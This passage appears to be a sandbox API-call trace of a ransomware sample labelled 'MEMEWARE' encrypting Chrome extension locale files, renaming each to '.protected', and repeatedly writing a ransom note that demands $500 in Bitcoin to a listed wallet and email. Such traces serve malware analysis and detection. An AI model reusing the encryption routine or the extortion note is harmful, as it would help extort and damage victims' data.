1 [0079.375] CloseHandle (hObject=0x168) returned 1 [0079.375] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.protected") returned 166 [0079.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.protected")) returned 1 [0079.376] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.376] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.376] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\RESTORE_FILES.txt") returned 160 [0079.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.377] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.377] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.377] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.378] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.378] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.378] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.378] CloseHandle (hObject=0x164) returned 1 [0079.378] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.378] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0079.378] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0079.378] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0079.378] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0079.378] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0079.378] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it") returned 142 [0079.378] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0079.378] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0079.378] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\*") returned 144 [0079.378] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.378] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.378] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.378] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.378] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.378] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.379] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\.") returned 144 [0079.379] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.379] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.379] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.379] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.379] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.379] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.379] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.379] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\..") returned 145 [0079.379] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.379] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.379] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.379] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.379] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.379] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.379] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.379] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.379] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json") returned 156 [0079.379] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.379] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.379] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.379] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.379] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json") returned 156 [0079.379] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json") returned 156 [0079.380] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json") returned 156 [0079.380] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.380] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x102, lpOverlapped=0x0) returned 1 [0079.380] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.381] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x102, lpOverlapped=0x0) returned 1 [0079.381] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.381] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.381] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.381] CloseHandle (hObject=0x168) returned 1 [0079.381] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.protected") returned 166 [0079.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.protected")) returned 1 [0079.382] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.382] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.382] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\RESTORE_FILES.txt") returned 160 [0079.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.382] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.382] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.383] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.383] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.383] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.383] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.384] CloseHandle (hObject=0x164) returned 1 [0079.384] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.384] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0079.384] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0079.384] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0079.384] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0079.384] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0079.384] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja") returned 142 [0079.384] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0079.384] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0079.384] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\*") returned 144 [0079.384] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.384] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.384] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.384] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.384] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.384] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.384] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\.") returned 144 [0079.384] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.384] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.384] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.385] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.385] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.385] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.385] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.385] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\..") returned 145 [0079.385] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.385] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.385] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.385] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.385] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.385] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.385] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.385] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.385] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json") returned 156 [0079.385] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.385] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.385] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.385] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.386] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json") returned 156 [0079.386] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.386] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json") returned 156 [0079.386] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.386] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json") returned 156 [0079.386] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.386] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x125, lpOverlapped=0x0) returned 1 [0079.387] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffedb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.387] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x125, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x125, lpOverlapped=0x0) returned 1 [0079.387] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.388] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.388] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.388] CloseHandle (hObject=0x168) returned 1 [0079.388] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.protected") returned 166 [0079.388] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json"), 